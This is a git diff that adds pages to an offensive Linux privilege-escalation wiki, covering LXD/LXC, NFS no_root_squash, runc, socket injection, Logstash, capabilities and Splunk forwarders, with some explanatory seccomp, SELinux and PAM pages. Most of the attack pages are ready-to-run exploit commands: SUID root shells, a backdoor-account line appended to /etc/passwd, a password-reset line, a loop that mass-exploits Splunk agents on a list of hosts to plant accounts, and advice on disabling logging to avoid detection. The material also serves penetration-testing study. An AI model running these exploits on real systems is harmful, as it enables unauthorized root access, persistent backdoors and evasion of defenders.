+#### Example with binary + +If the binary **`tcpdump`** has this capability you will be able to use it to capture network information. + +```bash +getcap -r / 2>/dev/null +/usr/sbin/tcpdump = cap_net_raw+ep +``` + +Note that if the **environment** is giving this capability you could also use **`tcpdump`** to sniff traffic. + +#### Example with binary 2 + +The following example is **`python2`** code that can be useful to intercept traffic of the "**lo**" \(**localhost**\) interface. The code is from the lab "_The Basics: CAP-NET\_BIND + NET\_RAW_" from [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com/) + +```python +import socket +import struct + +flags=["NS","CWR","ECE","URG","ACK","PSH","RST","SYN","FIN"] + +def getFlag(flag_value): + flag="" + for i in xrange(8,-1,-1): + if( flag_value & 1 < "whoami" + interval => 120 + } +} + +output { + file { + path => "/tmp/output.log" + codec => rubydebug + } +} +``` + +The **interval** specifies the time in seconds. In this example the **whoami** command is executed every 120 seconds. The output of the command is saved into **/tmp/output.log**. + +If **/etc/logstash/logstash.yml** contains the entry **config.reload.automatic: true** you only have to wait until the command gets executed, since Logstash will automatically recognize new pipeline configuration files or any changes in existing pipeline configurations. Otherwise trigger a restart of the logstash service. + +If no wildcard is used, you can apply those changes to an existing pipeline configuration. **Make sure you do not break things!** + +## References + +* [https://insinuator.net/2021/01/pentesting-the-elk-stack/](https://insinuator.net/2021/01/pentesting-the-elk-stack/) + diff --git a/linux-unix/privilege-escalation/lxd-privilege-escalation.md b/linux-unix/privilege-escalation/lxd-privilege-escalation.md new file mode 100644 index 00000000000..5380110ae09 --- /dev/null +++ b/linux-unix/privilege-escalation/lxd-privilege-escalation.md @@ -0,0 +1,68 @@ +# lxc - Privilege escalation + +If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root + +## Exploiting without internet + +You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)\(follow the instructions of the github\): + +```bash +#Install requirements +sudo apt update +sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools +#Clone repo +go get -d -v github.com/lxc/distrobuilder +#Make distrobuilder +cd $HOME/go/src/github.com/lxc/distrobuilder +make +cd +#Prepare the creation of alpine +mkdir -p $HOME/ContainerImages/alpine/ +cd $HOME/ContainerImages/alpine/ +wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml +#Create the container +sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml +``` + +Then, upload to the server the files **lxd.tar.xz** and **rootfs.squashfs** + +Add the image: + +```bash +lxc image import lxd.tar.xz rootfs.squashfs --alias alpine +lxc image list #You can see your new imported image +``` + +Create a container and add root path + +```bash +lxc init alpine privesc -c security.privileged=true +lxc list #List containers + +lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true +``` + +Execute the container: + +```bash +lxc start privesc +lxc exec privesc /bin/sh +[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted +``` + +## With internet + +You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html). + +```bash +lxc init ubuntu:16.04 test -c security.privileged=true +lxc config device add test whatever disk source=/ path=/mnt/root recursive=true +lxc start test +lxc exec test bash +[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted +``` + +## Other Refs + +{% embed url="https://reboare.github.io/lxd/lxd-escape.html" caption="" %} + diff --git a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md new file mode 100644 index 00000000000..5c4d40e80b6 --- /dev/null +++ b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -0,0 +1,147 @@ +# NFS no\_root\_squash/no\_all\_squash misconfiguration PE + +Read the _**/etc/exports**_ file, if you find some directory that is configured as **no\_root\_squash**, then you can **access** it from **as a client** and **write inside** that directory **as** if you were the local **root** of the machine. + +**no\_root\_squash**: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications. + +**no\_all\_squash:** This is similar to **no\_root\_squash** option but applies to **non-root users**. Imagine, you have a shell as nobody user; checked /etc/exports file; no\_all\_squash option is present; check /etc/passwd file; emulate a non-root user; create a suid file as that user \(by mounting using nfs\). Execute the suid as nobody user and become different user. + +## Privilege Escalation + +### Remote Exploit + +If you have found this vulnerability, you can exploit it: + +* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder the **/bin/bash** binary and giving it **SUID** rights, and **executing from the victim** machine that bash binary. + +```bash +#Attacker, as root user +mkdir /tmp/pe +mount -t nfs : /tmp/pe +cd /tmp/pe +cp /bin/bash . +chmod +s bash + +#Victim +cd +./bash -p #ROOT shell +``` + +* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it **SUID** rights, and **execute from the victim** machine that binary \(you can find here some[ C SUID payloads](payloads-to-execute.md#c)\). + +```bash +#Attacker, as root user +gcc payload.c -o payload +mkdir /tmp/pe +mount -t nfs : /tmp/pe +cd /tmp/pe +cp /tmp/payload . +chmod +s payload + +#Victim +cd +./payload #ROOT shell +``` + +### Local Exploit + +{% hint style="info" %} +Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**. +The following trick is in case the file `/etc/exports` **indicates an IP**. In this case you **won't be able to use** in any case the **remote exploit** and you will need to **abuse this trick**. +Another required requirement for the exploit to work is that **the export inside `/etc/export`** **must be using the `insecure` flag**. +--_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_-- +{% endhint %} + +**Trick copied from** [**https://www.errno.fr/nfs\_privesc.html**](https://www.errno.fr/nfs_privesc.html)\*\*\*\* + +Now, let’s assume that the share server still runs `no_root_squash` but there is something preventing us from mounting the share on our pentest machine. This would happen if the `/etc/exports` has an explicit list of IP addresses allowed to mount the share. + +Listing the shares now shows that only the machine we’re trying to privesc on is allowed to mount it: + +```text +[root@pentest]# showmount -e nfs-server +Export list for nfs-server: +/nfs_root machine +``` + +This means that we’re stuck exploiting the mounted share on the machine locally from an unprivileged user. But it just so happens that there is another, lesser known local exploit. + +This exploit relies on a problem in the NFSv3 specification that mandates that it’s up to the client to advertise its uid/gid when accessing the share. Thus it’s possible to fake the uid/gid by forging the NFS RPC calls if the share is already mounted! + +Here’s a [library that lets you do just that](https://github.com/sahlberg/libnfs). + +#### Compiling the example + +Depending on your kernel, you might need to adapt the example. In my case I had to comment out the fallocate syscalls. + +```bash +./bootstrap +./configure +make +gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/ +``` + +#### Exploiting using the library + +Let’s use the simplest of exploits: + +```bash +cat pwn.c +int main(void){setreuid(0,0); system("/bin/bash"); return 0;} +gcc pwn.c -o a.out +``` + +Place our exploit on the share and make it suid root by faking our uid in the RPC calls: + +```text +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/ +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out +``` + +All that’s left is to launch it: + +```text +[w3user@machine libnfs]$ /mnt/share/a.out +[root@machine libnfs]# +``` + +There we are, local root privilege escalation! + +### Bonus NFShell + +Once local root on the machine, I wanted to loot the NFS share for possible secrets that would let me pivot. But there were many users of the share all with their own uids that I couldn’t read despite being root because of the uid mismatch. I didn’t want to leave obvious traces such as a chown -R, so I rolled a little snippet to set my uid prior to running the desired shell command: + +```python +#!/usr/bin/env python +import sys +import os + +def get_file_uid(filepath): + try: + uid = os.stat(filepath).st_uid + except OSError as e: + return get_file_uid(os.path.dirname(filepath)) + return uid + +filepath = sys.argv[-1] +uid = get_file_uid(filepath) +os.setreuid(uid, uid) +os.system(' '.join(sys.argv[1:])) +``` + +You can then run most commands as you normally would by prefixing them with the script: + +```text +[root@machine .tmp]# ll ./mount/ +drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old +[root@machine .tmp]# ls -la ./mount/9.3_old/ +ls: cannot open directory ./mount/9.3_old/: Permission denied +[root@machine .tmp]# ./nfsh.py ls --color -l ./mount/9.3_old/ +drwxr-x--- 2 1008 1009 1024 Apr 5 2017 bin +drwxr-x--- 4 1008 1009 1024 Apr 5 2017 conf +drwx------ 15 1008 1009 1024 Apr 5 2017 data +drwxr-x--- 2 1008 1009 1024 Apr 5 2017 install +``` + diff --git a/linux-unix/privilege-escalation/pam-pluggable-authentication-modules.md b/linux-unix/privilege-escalation/pam-pluggable-authentication-modules.md new file mode 100644 index 00000000000..a023e9ffde5 --- /dev/null +++ b/linux-unix/privilege-escalation/pam-pluggable-authentication-modules.md @@ -0,0 +1,57 @@ +# PAM - Pluggable Authentication Modules + +PAM is a collection of modules that essentially form a barrier between a service on your system, and the user of the service. The modules can have widely varying purposes, from disallowing a login to users from a particular UNIX group \(or netgroup, or subnet…\), to implementing resource limits so that your ‘research’ group can’t hog system resources. + +## Config Files + +Solaris and other commercial UNIX systems have a slightly different configuration model, centered around a single file, **`/etc/pam.conf`**. On most Linux systems, these configuration files live in **`/etc/pam.d`**, and are named after the service – for example, the ‘login’ configuration file is called **`/etc/pam.d/login`**. Let’s have a quick look at a version of that file: + +```text +auth required /lib/security/pam_securetty.so +auth required /lib/security/pam_nologin.so +auth sufficient /lib/security/pam_ldap.so +auth required /lib/security/pam_unix_auth.so try_first_pass +account sufficient /lib/security/pam_ldap.so +account required /lib/security/pam_unix_acct.so +password required /lib/security/pam_cracklib.so +password required /lib/security/pam_ldap.so +password required /lib/security/pam_pwdb.so use_first_pass +session required /lib/security/pam_unix_session.so +``` + +### **PAM Management Realms** + +The leftmost column can contains four unique words, which represent four realms of PAM management: **auth**, **account**, **password** and **session**. While there are many modules which support more than one of these realms \(indeed, pam\_unix supports all of them\), others, like pam\_cracklib for instance, are only suited for one \(the ‘password’ facility in pam\_cracklib’s case\). + +* **auth**: The ‘auth’ realm \(I call it a realm – the docs refer to it as a ‘management group’ or ‘facility’\) is responsible for checking that the user is who they say. The modules that can be listed in this area **generally** support **prompting for a password**. +* **account**: This area is responsible for a wide array of possible **account verification functionality**. There are many modules available for this facility. Constraints to the use of a service based on **checking group membership**, time of day, whether a user account is local or remote, etc., are generally enforced by modules which support this facility. +* **password**: The modules in this area are responsible for any functionality needed in the course of **updating passwords** for a given service. Most of the time, this section is pretty ‘ho-hum’, simply calling a module that **will prompt for a current password**, and, assuming that’s successful, prompt you for a new one. Other modules could be added to perform **password complexity** or dictionary checking as well, such as that performed by the pam\_cracklib and pam\_pwcheck modules. +* **session**: Modules in this area perform any number of things that happen either **during the setup or cleanup of a service** for a given user. This may include any number of things; launching a system-wide initialization script, performing special logging, **mounting the user’s home directory**, or setting resource limits. + +### **PAM Module Controls** + +The **middle column** holds a keyword that essentially determines w**hat PAM should do if the module either succeeds or fails**. These keywords are called ‘**controls**’ in PAM-speak. In 90% of the cases, you can use one of the common keywords \(**requisite**, **required**, **sufficient** or **optional**\). However, this is only the tip of the iceberg in terms of unleashing the flexibility and power of PAM. + +* **required**: If a ‘required’ module returns a status that is **not ‘success’**, the **operation will ultimately fail ALWAYS**, but only after the **modules below it are invoked**. This seems senseless at first glance I suppose, but it serves the purpose of **always acting the same way from the point of view of the user** trying to utilize the service. The net effect is that it becomes **impossible** for a potential cracker to **determine** **which** **module** caused the **failure**. +* **requisite**: If a ‘requisite’ module fails, the **operation** not only **fails**, but the operation is **immediately** **terminated** with a failure without invoking any other modules. +* **sufficient**: If a **sufficient** module **succeeds**, it is enough to satisfy the requirements of sufficient modules in that realm for use of the service, and **modules below it that are also listed as ‘sufficient’ are not invoked**. **If it fails, the operation fails unless a module invoked after it succeeds**. +* **optional**: An ''optional’ module, according to the pam\(8\) manpage, **will only cause an operation to fail if it’s the only module in the stack for that facility**. + +### Example + +In our example file, we have four modules stacked for the auth realm: + +```text +auth required /lib/security/pam_securetty.so +auth required /lib/security/pam_env.so +auth sufficient /lib/security/pam_ldap.so +auth required /lib/security/pam_unix.so try_first_pass +``` + +As the modules are invoked in order, here is what will happen: + +1. The ‘**pam\_securetty**’ module will check its config file, **`/etc/securetty`**, and see if the terminal being used for this login is listed in the file. If **it’s not, root logins will not be permitted**. If you try to log in as root on a ‘bad’ terminal, this module will fail. Since it’s ‘required’, it will still invoke all of the modules in the stack. However, even if every one of them succeeds, the login will fail. Interesting to note is that if the module were listed as ‘requisite’, the operation would terminate with a failure immediately, without invoking any of the other modules, no matter what their status. +2. The ‘**pam\_env**’ module will s**et environment variables** based on what the administrator has set up in /etc/security/pam\_env.conf. On a default setup of Redhat 9, Fedora Core 1, and Mandrake 9.2, the configuration file for this module doesn’t actually set any variables. A good use for this might be automatically setting a DISPLAY environment variable for a user logging in via SSH so they don’t have to set it themselves if they want to shoot an ‘xterm’ back to their remote desktop \(though this can be taken care of by OpenSSH automagically\). +3. The ‘**pam\_ldap**’ module will **prompt** the user for a **password**, and then check the ldap directory indicated in **`/etc/ldap.conf`** to authenticate the user. If this fails, the operation can still succeed if ‘pam\_unix’ succeeds in authenticating the user. If pam\_ldap succeeds, ‘pam\_unix’ will not be invoked. +4. The ‘**pam\_unix**’ module, in this case, will **not prompt the user for a password**. The ‘try\_first\_pass’ argument will tell the module to **use the password given to it by the preceding module** \(in this case, pam\_ldap\). It will try to authenticate the user using the standard getpw\* system calls. If pam\_unix fails, and pam\_ldap has failed, the operation will fail. If pam\_ldap fails, but pam\_unix succeeds, the operation will succeed \(this is extremely helpful in cases where root is not in the ldap directory, but is still in the local /etc/passwd file!\). + diff --git a/src/linux-hardening/processes-crontab-systemd-dbus/payloads-to-execute.md b/linux-unix/privilege-escalation/payloads-to-execute.md similarity index 82% rename from src/linux-hardening/processes-crontab-systemd-dbus/payloads-to-execute.md rename to linux-unix/privilege-escalation/payloads-to-execute.md index ef0e94a5d68..d4d4b29d009 100644 --- a/src/linux-hardening/processes-crontab-systemd-dbus/payloads-to-execute.md +++ b/linux-unix/privilege-escalation/payloads-to-execute.md @@ -1,7 +1,5 @@ # Payloads to execute -{{#include ../../banners/hacktricks-training.md}} - ## Bash ```bash @@ -14,7 +12,7 @@ cp /bin/bash /tmp/b && chmod +s /tmp/b ```c //gcc payload.c -o payload int main(void){ - setresuid(0, 0, 0); //Set as user suid user + setresuid(0, 0, 0); #Set as user suid user system("/bin/sh"); return 0; } @@ -33,29 +31,14 @@ int main(){ } ``` -```c -// Privesc to user id: 1000 -#define _GNU_SOURCE -#include -#include - -int main(void) { - char *const paramList[10] = {"/bin/bash", "-p", NULL}; - const int id = 1000; - setresuid(id, id, id); - execve(paramList[0], paramList, NULL); - return 0; -} -``` - ## Overwriting a file to escalate privileges ### Common files -- Add user with password to _/etc/passwd_ -- Change password inside _/etc/shadow_ -- Add user to sudoers in _/etc/sudoers_ -- Abuse docker through the docker socket, usually in _/run/docker.sock_ or _/var/run/docker.sock_ +* Add user with password to _/etc/passwd_ +* Change password inside _/etc/shadow_ +* Add user to sudoers in _/etc/sudoers_ +* Abuse docker through the docker socket, usually in _/run/docker.sock_ or _/var/run/docker.sock_ ### Overwriting a library @@ -73,7 +56,7 @@ ldd /bin/su /lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) ``` -In this case lets try to impersonate `/lib/x86_64-linux-gnu/libaudit.so.1`.\ +In this case lets try to impersonate `/lib/x86_64-linux-gnu/libaudit.so.1`. So, check for functions of this library used by the **`su`** binary: ```bash @@ -132,7 +115,5 @@ echo "root:hacked" | chpasswd echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd ``` -{{#include ../../banners/hacktricks-training.md}} - - +### diff --git a/linux-unix/privilege-escalation/runc-privilege-escalation.md b/linux-unix/privilege-escalation/runc-privilege-escalation.md new file mode 100644 index 00000000000..576211965b0 --- /dev/null +++ b/linux-unix/privilege-escalation/runc-privilege-escalation.md @@ -0,0 +1,44 @@ +# RunC Privilege Escalation + +## Basic information + +If you want to learn more about **runc** check the following page: + +{% page-ref page="../../pentesting/2375-pentesting-docker.md" %} + +## PE + +If you find that `runc` is installed in the host you may be able to **run a container mounting the root / folder of the host**. + +```bash +runc -help #Get help and see if runc is intalled +runc spec #This will create the config.json file in your current folder + +Inside the "mounts" section of the create config.json add the following lines: +{ + "type": "bind", + "source": "/", + "destination": "/", + "options": [ + "rbind", + "rw", + "rprivate" + ] +}, + +#Once you have modified the config.json file, create the folder rootfs in the same directory +mkdir rootfs + +# Finally, start the container +# The root folder is the one from the host +runc run demo +``` + +{% hint style="danger" %} +This won't always work as the default operation of runc is to run as root, so running it as an unprivileged user simply cannot work \(unless you have a rootless configuration\). Making a rootless configuration the default isn't generally a good idea because there are quite a few restrictions inside rootless containers that don't apply outside rootless containers. +{% endhint %} + + + + + diff --git a/linux-unix/privilege-escalation/seccomp.md b/linux-unix/privilege-escalation/seccomp.md new file mode 100644 index 00000000000..db4df0664b9 --- /dev/null +++ b/linux-unix/privilege-escalation/seccomp.md @@ -0,0 +1,119 @@ +# Seccomp + +## Basic Information + +**Seccomp** or Secure Computing mode is a feature of Linux kernel which can act as **syscall filter**. +Seccomp has 2 modes. + +### **Original/Strict Mode** + +In this mode ****Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL + +{% code title="seccomp\_strict.c" %} +```c +#include +#include +#include +#include +#include +#include + +//From https://sysdig.com/blog/selinux-seccomp-falco-technical-discussion/ +//gcc seccomp_strict.c -o seccomp_strict + +int main(int argc, char **argv) +{ + int output = open("output.txt", O_WRONLY); + const char *val = "test"; + + //enables strict seccomp mode + printf("Calling prctl() to set seccomp strict mode...\n"); + prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); + + //This is allowed as the file was already opened + printf("Writing to an already open file...\n"); + write(output, val, strlen(val)+1); + + //This isn't allowed + printf("Trying to open file for reading...\n"); + int input = open("output.txt", O_RDONLY); + + printf("You will not see this message--the process will be killed first\n"); +} +``` +{% endcode %} + +### Seccomp-bpf + +This mode allows f**iltering of system calls using a configurable policy** implemented using Berkeley Packet Filter rules. + +{% code title="seccomp\_bpf.c" %} +```c +#include +#include +#include +#include + +//https://security.stackexchange.com/questions/168452/how-is-sandboxing-implemented/175373 +//gcc seccomp_bpf.c -o seccomp_bpf -lseccomp + +void main(void) { + /* initialize the libseccomp context */ + scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); + + /* allow exiting */ + printf("Adding rule : Allow exit_group\n"); + seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); + + /* allow getting the current pid */ + //printf("Adding rule : Allow getpid\n"); + //seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); + + printf("Adding rule : Deny getpid\n"); + seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(getpid), 0); + /* allow changing data segment size, as required by glibc */ + printf("Adding rule : Allow brk\n"); + seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); + + /* allow writing up to 512 bytes to fd 1 */ + printf("Adding rule : Allow write upto 512 bytes to FD 1\n"); + seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, + SCMP_A0(SCMP_CMP_EQ, 1), + SCMP_A2(SCMP_CMP_LE, 512)); + + /* if writing to any other fd, return -EBADF */ + printf("Adding rule : Deny write to any FD except 1 \n"); + seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, + SCMP_A0(SCMP_CMP_NE, 1)); + + /* load and enforce the filters */ + printf("Load rules and enforce \n"); + seccomp_load(ctx); + seccomp_release(ctx); + //Get the getpid is denied, a weird number will be returned like + //this process is -9 + printf("this process is %d\n", getpid()); +} +``` +{% endcode %} + +## Seccomp in Docker + +**Seccomp-bpf** is supported by **Docker** to restrict the **syscalls** from the containers effectively decreasing the surface area. You can find the **syscalls blocked** by **default** in [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) and the **default seccomp profile** can be found here [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json). +You can run a docker container with a **different seccomp** policy with: + +```bash +docker run --rm \ + -it \ + --security-opt seccomp=/path/to/seccomp/profile.json \ + hello-world +``` + +If you want for example to **forbid** a container of executing some **syscall** like `uname` you could download the default profile from [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) and just **remove the `uname` string from the list**. +If you wan to make sure that **some binary doesn't work inside a a docker container** you could use strace to list the syscalls the binary is using and then forbid them. +In the following example the **syscalls** of `uname` are discovered: + +```bash +docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname +``` + diff --git a/linux-unix/privilege-escalation/selinux.md b/linux-unix/privilege-escalation/selinux.md new file mode 100644 index 00000000000..df61131c23d --- /dev/null +++ b/linux-unix/privilege-escalation/selinux.md @@ -0,0 +1,6 @@ +# SELinux + +## SELinux Users + +There are SELinux users in addition to the regular Linux users. SELinux users are part of an SELinux policy. Each Linux user is mapped to a SELinux user as part of the policy. This allows Linux users to inherit the restrictions and security rules and mechanisms placed on SELinux users. + diff --git a/linux-unix/privilege-escalation/socket-command-injection.md b/linux-unix/privilege-escalation/socket-command-injection.md new file mode 100644 index 00000000000..ea3f0f570cd --- /dev/null +++ b/linux-unix/privilege-escalation/socket-command-injection.md @@ -0,0 +1,47 @@ +# Socket Command Injection + +### Socket binding example with Python + +In the following example a **unix socket is created** \(`/tmp/socket_test.s`\) and everything **received** is going to be **executed** by `os.system`.I know that you aren't going to find this in the wild, but the goal of this example is to see how a code using unix sockets looks like, and how to manage the input in the worst case possible. + +{% code title="s.py" %} +```python +import socket +import os, os.path +import time +from collections import deque + +if os.path.exists("/tmp/socket_test.s"): + os.remove("/tmp/socket_test.s") + +server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) +server.bind("/tmp/socket_test.s") +os.system("chmod o+w /tmp/socket_test.s") +while True: + server.listen(1) + conn, addr = server.accept() + datagram = conn.recv(1024) + if datagram: + print(datagram) + os.system(datagram) + conn.close() +``` +{% endcode %} + +**Execute** the code using python: `python s.py` and **check how the socket is listening**: + +```python +netstat -a -p --unix | grep "socket_test" +(Not all processes could be identified, non-owned process info + will not be shown, you would have to be root to see it all.) +unix 2 [ ACC ] STREAM LISTENING 901181 132748/python /tmp/socket_test.s +``` + +**Exploit** + +```python +echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s +``` + + + diff --git a/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md b/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md new file mode 100644 index 00000000000..fcffdf03f89 --- /dev/null +++ b/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md @@ -0,0 +1,149 @@ +# Splunk LPE and Persistence + +If **enumerating** a machine **internally** or **externally** you find **Splunk running** \(port 8090\), if you luckily know any **valid credentials** you can **abuse the Splunk service** to **execute a shell** as the user running Splunk. If root is running it, you can escalate privileges to root. + +Also if you are **already root and the Splunk service is not listening only on localhost**, you can **steal** the **password** file **from** the Splunk service and **crack** the passwords, or **add new** credentials to it. And maintain persistence on the host. + +In the first image below you can see how a Splunkd web page looks like. + +**The following information was copied from** [**https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/**](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/)\*\*\*\* + +## Abusing Splunk Forwarders For Shells and Persistence + +14 Aug 2020 + +### Description: + +The Splunk Universal Forwarder Agent \(UF\) allows authenticated remote users to send single commands or scripts to the agents through the Splunk API. The UF agent doesn’t validate connections coming are coming from a valid Splunk Enterprise server, nor does the UF agent validate the code is signed or otherwise proven to be from the Splunk Enterprise server. This allows an attacker who gains access to the UF agent password to run arbitrary code on the server as SYSTEM or root, depending on the operating system. + +This attack is being used by Penetration Testers and is likely being actively exploited in the wild by malicious attackers. Gaining the password could lead to the compromise of hundreds of system in a customer environment. + +Splunk UF passwords are relatively easy to acquire, see the secion Common Password Locations for details. + +### Context: + +Splunk is a data aggregation and search tool often used as a Security Information and Event Monitoring \(SIEM\) system. Splunk Enterprise Server is a web application which runs on a server, with agents, called Universal Forwarders, which are installed on every system in the network. Splunk provides agent binaries for Windows, Linux, Mac, and Unix. Many organizations use Syslog to send data to Splunk instead of installing an agent on Linux/Unix hosts but agent installation is becomming increasingly popular. + +Universal Forwarder is accessible on each host at https://host:8089. Accessing any of the protected API calls, such as /service/ pops up a Basic authentication box. The username is always admin, and the password default used to be changeme until 2016 when Splunk required any new installations to set a password of 8 characters or higher. As you will note in my demo, complexity is not a requirement as my agent password is 12345678. A remote attacker can brute force the password without lockout, which is a necessity of a log host, since if the account locked out then logs would no longer be sent to the Splunk server and an attacker could use this to hide their attacks. The following screenshot shows the Universal Forwarder agent, this initial page is accessible without authentication and can be used to enumerate hosts running Splunk Universal Forwarder. + +![0](https://eapolsniper.github.io/assets/2020AUG14/11_SplunkAgent.png) + +Splunk documentaiton shows using the same Universal Forwarding password for all agents, I don’t remember for sure if this is a requirement or if individual passwords can be set for each agent, but based on documentaiton and memory from when I was a Splunk admin, I believe all agents must use the same password. This means if the password is found or cracked on one system, it is likely to work on all Splunk UF hosts. This has been my personal experience, allowing compromise of hundreds of hosts quickly. + +### Common Password Locations + +I often find the Splunk Universal Forwarding agent plain text password in the following locations on networks: + +1. Active Directory Sysvol/domain.com/Scripts directory. Administrators store the executible and the password together for efficient agent installation. +2. Network file shares hosting IT installation files +3. Wiki or other build note repositories on internal network + +The password can also be accessed in hashed form in Program Files\Splunk\etc\passwd on Windows hosts, and in /opt/Splunk/etc/passwd on Linux and Unix hosts. An attacker can attempt to crack the password using Hashcat, or rent a cloud cracking environment to increase liklihood of cracking the hash. The password is a strong SHA-256 hash and as such a strong, random password is unlikely to be cracked. + +### Impact: + +An attacker with a Splunk Universal Forward Agent password can fully compromise all Splunk hosts in the network and gain SYSTEM or root level permissions on each host. I have successfully used the Splunk agent on Windows, Linux, and Solaris Unix hosts. This vulnerability could allow system credentials to be dumped, sensitive data to be exfiltrated, or ransomware to be installed. This vulnerability is fast, easy to use, and reliable. + +Since Splunk handles logs, an attacker could reconfigure the Universal Forwarder on the first command run to change the Forwarder location, disabling logging to the Splunk SIEM. This would drastically reduce the chances of being caught by the client Blue Team. + +Splunk Universal Forwarder is often seen installed on Domain Controllers for log collection, which could easily allow an attacker to extract the NTDS file, disable antivirus for further exploitation, and/or modify the domain. + +Finally, the Universal Forwarding Agent does not require a license, and can be configured with a password stand alone. As such an attacker can install Universal Forwarder as a backdoor persistence mechanism on hosts, since it is a legitimate application which customers, even those who do not use Splunk, are not likely to remove. + +### Evidence: + +To show an exploitation example I set up a test environment using the latest Splunk version for both the Enterprise Server and the Universal Forwarding agent. A total of 10 images have been attached to this report, showing the following: + +1- Requesting the /etc/passwd file through PySplunkWhisper2 + +![1](https://eapolsniper.github.io/assets/2020AUG14/1_RequestingPasswd.png) + +2- Receiving the /etc/passwd file on the attacker system through Netcat + +![2](https://eapolsniper.github.io/assets/2020AUG14/2_ReceivingPasswd.png) + +3- Requesting the /etc/shadow file through PySplunkWhisper2 + +![3](https://eapolsniper.github.io/assets/2020AUG14/3_RequestingShadow.png) + +4- Receiving the /etc/shadow file on the attacker system through Netcat + +![4](https://eapolsniper.github.io/assets/2020AUG14/4_ReceivingShadow.png) + +5- Adding the user attacker007 to the /etc/passwd file + +![5](https://eapolsniper.github.io/assets/2020AUG14/5_AddingUserToPasswd.png) + +6- Adding the user attacker007 to the /etc/shadow file + +![6](https://eapolsniper.github.io/assets/2020AUG14/6_AddingUserToShadow.png) + +7- Receiving the new /etc/shadow file showing attacker007 is successfully added + +![7](https://eapolsniper.github.io/assets/2020AUG14/7_ReceivingShadowFileAfterAdd.png) + +8- Confirming SSH access to the victim using the attacker007 account + +![8](https://eapolsniper.github.io/assets/2020AUG14/8_SSHAccessUsingAttacker007.png) + +9- Adding a backdoor root account with username root007, with the uid/gid set to 0 + +![9](https://eapolsniper.github.io/assets/2020AUG14/9_AddingBackdoorRootAccount.png) + +10- Confirming SSH access using attacker007, and then escalating to root using root007 + +![10](https://eapolsniper.github.io/assets/2020AUG14/10_EscalatingToRoot.png) + +At this point I have persistent access to the host both through Splunk and through the two user accounts created, one of which provides root. I can disable remote logging to cover my tracks and continue attacking the system and network using this host. + +Scripting PySplunkWhisperer2 is very easy and effective. + +1. Create a file with IP’s of hosts you want to exploit, example name ip.txt +2. Run the following: + +```bash +for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done +``` + +Host information: + +Splunk Enterprise Server: 192.168.42.114 +Splunk Forwarder Agent Victim: 192.168.42.98 +Attacker:192.168.42.51 + +Splunk Enterprise version: 8.0.5 \(latest as of August 12, 2020 – day of lab setup\) +Universal Forwarder version: 8.0.5 \(latest as of August 12, 2020 – day of lab setup\) + +#### 